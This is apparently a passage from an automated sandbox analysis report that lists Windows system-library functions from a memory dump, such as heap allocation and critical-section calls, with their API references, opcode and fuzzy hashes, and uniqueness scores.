                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentServiceSession
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1007659313-0
                                                                                                                            • Opcode ID: cd41840913fde36b44aca51169ed52aaca1c3c379bf37e85e3a76e03a02823ec
                                                                                                                            • Instruction ID: b4dcd2e1bd749654070154c201e0dbdbfc87c7f7f91bfbf11f67c9d8a6cfdb28
                                                                                                                            • Opcode Fuzzy Hash: cd41840913fde36b44aca51169ed52aaca1c3c379bf37e85e3a76e03a02823ec
                                                                                                                            • Instruction Fuzzy Hash: 6B01F532640705AFD7228A7AE980E5773E9FFC1714F00445AA951CB550DA38E802C750
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1EFC77, Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6061b1a105af8bd113dd05c63bffe6e8b683994392df491d5f2b64cd8341ed23
                                                                                                                            • Instruction ID: 3af017951849a6693c598401690def011b89470bef83870df49ac851a7087ac6
                                                                                                                            • Opcode Fuzzy Hash: 6061b1a105af8bd113dd05c63bffe6e8b683994392df491d5f2b64cd8341ed23
                                                                                                                            • Instruction Fuzzy Hash: 9E11CE70209E94AFE7128B18C598FB53BF8AB06B5AF6501E5EC64871E1C32CC981CA20
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2A8450, Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(00000000,?,?,?,?,6B2496F2,?,00000000,00000000,00000001,?,?,7FFE0386), ref: 6B2A848B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentServiceSession
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1007659313-0
                                                                                                                            • Opcode ID: fab0c485f60ad926169880dc8cf1c2acbb4a6bb70ced4fcaa2074de596fe31cb
                                                                                                                            • Instruction ID: ac55dfccd271ce018f000ec3595684ef58628b95463155f251396c6c7b8eee3b
                                                                                                                            • Opcode Fuzzy Hash: fab0c485f60ad926169880dc8cf1c2acbb4a6bb70ced4fcaa2074de596fe31cb
                                                                                                                            • Instruction Fuzzy Hash: A001D432200A459FD7218A69D881F97B7EEFFC5710F044869E6568F690DA78F841CBA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1EB02A, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                                            • Instruction ID: 8b4172f5285cc4110e354e0644fb8e2fff316da69722a4111983296ba59b5a1e
                                                                                                                            • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                                            • Instruction Fuzzy Hash: 50017172245A84AFD712875CC9C4F6B77E8EB46B55F0540E1E924CB6A1D72CEC81C620
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2A1074, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(00008000,00000000,00000000,?,?), ref: 6B2A10C8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentServiceSession
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1007659313-0
                                                                                                                            • Opcode ID: 9e84f8661e521ff54f313e1d594e9331ab66861e763175c91ca16aae41182276
                                                                                                                            • Instruction ID: 07009352208a3a1076bc42abf76641058ee1b3903a3ee8dc24b54de615663295
                                                                                                                            • Opcode Fuzzy Hash: 9e84f8661e521ff54f313e1d594e9331ab66861e763175c91ca16aae41182276
                                                                                                                            • Instruction Fuzzy Hash: B901287250474A9FC700DB39C881B1BB7D5AB85325F00C629F895972D0EF39D481CB92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D1480, Relevance: 1.5, APIs: 1, Instructions: 42memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6B1D187D: _wcsicmp.1105(0000001C,?,?,?,00000000,?,?,?,?), ref: 6B1D1921
                                                                                                                            • RtlFreeHeap.1105(?,00000000,?,00000000,00000000,?,00000000,?,?,?), ref: 6B1D14D3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeHeap_wcsicmp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3832816018-0
                                                                                                                            • Opcode ID: cf7d4663d62046aefbf398c2601a6ef7ccf85a2c444bb44e9c472d1d2916286d
                                                                                                                            • Instruction ID: 87d3067c44392eb6ff678ecd26bc2c41a118c51c1f2f9f2b078f9d02388b6e5d
                                                                                                                            • Opcode Fuzzy Hash: cf7d4663d62046aefbf398c2601a6ef7ccf85a2c444bb44e9c472d1d2916286d
                                                                                                                            • Instruction Fuzzy Hash: 7CF08736B01128BBDB15DA59C941FBEB7ADEB84600F1401AAA805EB640DB38AE12C7D0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D3591, Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ZwSetInformationFile.1105(?,?,?,00000008,0000001E), ref: 6B1D35CE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: FileInformation
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4253254148-0
                                                                                                                            • Opcode ID: f6e0febadd5fde40c3eeffad060a4314c3d5d20580ee8ab27703d0150818c60e
                                                                                                                            • Instruction ID: 5686a8c923ac68ab69bd57197f9fce96feff4f8a88ea6853851837d6ef0a6ee1
                                                                                                                            • Opcode Fuzzy Hash: f6e0febadd5fde40c3eeffad060a4314c3d5d20580ee8ab27703d0150818c60e
                                                                                                                            • Instruction Fuzzy Hash: FCF0C8B1A01248BBE724DB759551FAA77E8DF55710F00C196DD01E7100DB7AD942C7A0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D1BE9, Relevance: 1.5, APIs: 1, Instructions: 38memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.1105(?,00000000,00000010,?,C0000017,?,?,6B1D16AA,?,?,?,?,?,?,?,?), ref: 6B1D1C19
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1279760036-0
                                                                                                                            • Opcode ID: 41b619a71a48c2b8fc4bd3b9482bbcb6548e364b6e99d490dbd24e33bd0f4c0c
                                                                                                                            • Instruction ID: 8fb09f2059ceca957340ab9b44e2b6a9aa443e1d121c72ef9398910319439574
                                                                                                                            • Opcode Fuzzy Hash: 41b619a71a48c2b8fc4bd3b9482bbcb6548e364b6e99d490dbd24e33bd0f4c0c
                                                                                                                            • Instruction Fuzzy Hash: A0F0B471754208BBE718CB2ACD01B56B3EDEF98315F1080B99849C7260FBB6EE22D754
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1DF358, Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.1105(?,00000008,?,00000002,00000055,00000000,?,?,6B28D6D4,00000001,00000000,?,?,00000000,00000000,6B1E71B4), ref: 6B1DF387
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1279760036-0
                                                                                                                            • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                                            • Instruction ID: 2964f6cc644ba6ac70d738e283064cd4f5c55e255ff367f00fa9ea11da444013
                                                                                                                            • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                                            • Instruction Fuzzy Hash: 38E0DF32A40118BBDB219BE99E06FABBBACDB48A61F0101A6B904D7150DA689F00C3D0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B204710, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,?,6B2040DB,?,00000000,00000000,?,?,?,?,?,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion), ref: 6B204716
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentServiceSession
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1007659313-0
                                                                                                                            • Opcode ID: 0df256ba2b9307f516b5a4f7d47ef3065f2fd7a7a153fc2d55d4bb558cf3f2de
                                                                                                                            • Instruction ID: acf572a6137e74885a19e5e29dd46fce69bb14e6f3e499ec67bf33b269b39985
                                                                                                                            • Opcode Fuzzy Hash: 0df256ba2b9307f516b5a4f7d47ef3065f2fd7a7a153fc2d55d4bb558cf3f2de
                                                                                                                            • Instruction Fuzzy Hash: 17F0E5762483089FC706CF25D0C0A853BF5AB57355F000095EC508B7A0DB3DE841CB44
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D15C1, Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000008,00000000,?,6B1D1598,?), ref: 6B22EF10
                                                                                                                              • Part of subcall function 6B1D1480: RtlFreeHeap.1105(?,00000000,?,00000000,00000000,?,00000000,?,?,?), ref: 6B1D14D3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3298025750-0
                                                                                                                            • Opcode ID: abd4c1e868dd77add1da121991445beedef88028e086df1525fa9b969b472fc7
                                                                                                                            • Instruction ID: fcbe5609eee7fd0df9b8175b13f31d4390c7a1d1766a54c743682e51e8ebd089
                                                                                                                            • Opcode Fuzzy Hash: abd4c1e868dd77add1da121991445beedef88028e086df1525fa9b969b472fc7
                                                                                                                            • Instruction Fuzzy Hash: B7E02B32654155B3CB209A54C441F96B3A9AF53704F0080B1E8018B141DB6CDC62C3D0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B215C70, Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ZwSetInformationWorkerFactory.1105(?,0000000E,00000000,00000004,?,6B2A8100,00000000,00000000,00000000,00000000,6B2C86C4,6B2C86C4,00000008,?,00000000,00000008), ref: 6B215C9C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: FactoryInformationWorker
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 270927234-0
                                                                                                                            • Opcode ID: 34ebfc428057f1d066085d30c230a90e4380f848c7c6ec9c19e36091452cd574
                                                                                                                            • Instruction ID: db822ad1df5884e3cde385bb0edccff70e68b0f45987131ef2b30a5f782b9120
                                                                                                                            • Opcode Fuzzy Hash: 34ebfc428057f1d066085d30c230a90e4380f848c7c6ec9c19e36091452cd574
                                                                                                                            • Instruction Fuzzy Hash: A5E09A7111824CAFEB00CF54C581F153BE9AB84B24F008195F7198B0A0D778D884CB44
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2641E8, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlEnterCriticalSection.1105(?,6B2B08F0,00000008,6B26426A,6B2B08D0,00000008,6B209B80,?,?,?,?,6B1EED2D,-00000F38,6B2C84D8,6B2C84D8,6B2217F0), ref: 6B264206
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalEnterSection
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1904992153-0
                                                                                                                            • Opcode ID: 86cfe311d76342b66e096b83270ef78534e2d0090c031c9f574bcfb9d740e270
                                                                                                                            • Instruction ID: 2ce49dc9545e364a803d6713f7fb4f50dbdaef6d061c48fad7748d9a3a0d843e
                                                                                                                            • Opcode Fuzzy Hash: 86cfe311d76342b66e096b83270ef78534e2d0090c031c9f574bcfb9d740e270
                                                                                                                            • Instruction Fuzzy Hash: 57F0F87A8916889FCBD0CB66C58972437F4E745395F61816590588E294E73C8589CF11
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2035A1, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlLeaveCriticalSection.1105(?,6B2032EE,?,0000003A,6B2C79A0,?,00000000,6B2217F0,6B2AFF28,000000FE,?,6B202F61), ref: 6B2035C1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalLeaveSection
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3988221542-0
                                                                                                                            • Opcode ID: 14845ae56d88bc93e7e13586de649d2c15dfd556f439d3f7c3588f7971fc64de
                                                                                                                            • Instruction ID: 9dbae50a1a1a19eaeb172048df09268545c2d5689226818101805ef1733648f3
                                                                                                                            • Opcode Fuzzy Hash: 14845ae56d88bc93e7e13586de649d2c15dfd556f439d3f7c3588f7971fc64de
                                                                                                                            • Instruction Fuzzy Hash: 46D0A7718715899AD7519B10C1A4FD83BF1BB0C30DF5810958001054B1C73E4A0AC700
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1DDB40, Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.1105(?,00000008,00000064,6B1DDB76,6B2C66C0,00000000,0000EEEE,6B1E6DDE,6B2C66C0,0000EEEE,00000000,00000300,?,6B1E71B4,?,00000002), ref: 6B1DDB4D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1279760036-0
                                                                                                                            • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                                                            • Instruction ID: fe795633e8e251a3c707fb33d849e15436a82d04896ad681b3306fb7ba749e43
                                                                                                                            • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                                                            • Instruction Fuzzy Hash: 44C08C302C0A40BAEB220F20CE02B0036A4BB11B0AF8000A06300DA0F0DB7CE902EA00
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1DF340, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d652b91d5ef0918acbf59d3e8cd6e25e6976192bdb4fae21a80d1111f08600d0
                                                                                                                            • Instruction ID: d6bd4e10e4884d6a154b29321bd3a9c0fce4162843039dface0e59edb4acc834
                                                                                                                            • Opcode Fuzzy Hash: d652b91d5ef0918acbf59d3e8cd6e25e6976192bdb4fae21a80d1111f08600d0
                                                                                                                            • Instruction Fuzzy Hash: 9EC08C396215818FCF01CB38C2D0A843BF4FB80745FC908D0E800CBB21D21CD402CB00
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1F3A1C, Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.1105(?,00000000,00000000,?,6B2167C0,0000004E,00000000,?,6B2683BE,?,?), ref: 6B1F3A2F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1279760036-0
                                                                                                                            • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                                            • Instruction ID: b7c578d0542fbef201e6fa34f42cc0e9b79476b697719ce2a91046878e1e46a7
                                                                                                                            • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                                            • Instruction Fuzzy Hash: 95C04C32180648BBCB125E95DD01F157B6DE794B60F154021B6040A5618676ED61D598
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2036CC, Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.1105(?,00000000,00000000,6B203377,?,00000000,?,?,0000003A,6B2C79A0,?,00000000,6B2217F0,6B2AFF28,000000FE), ref: 6B2036E0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1279760036-0
                                                                                                                            • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                                                            • Instruction ID: 5715fcae78d4c9ee99d1c34f46dd01e439eb3fa90fb5a5805440916a825a0310
                                                                                                                            • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                                                            • Instruction Fuzzy Hash: B5C02B70150440BBDB150F70CE51F1072D8F704B32F6003947220454F0DA2CDC00D204
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1E76E2, Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlFreeHeap.1105(?,00000000,?,6B239584), ref: 6B1E76F8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3298025750-0
                                                                                                                            • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                                                            • Instruction ID: ba1a99781b89b5f73c7a95857a107a4563f60584e35f1f175ed38f1475a31cbc
                                                                                                                            • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
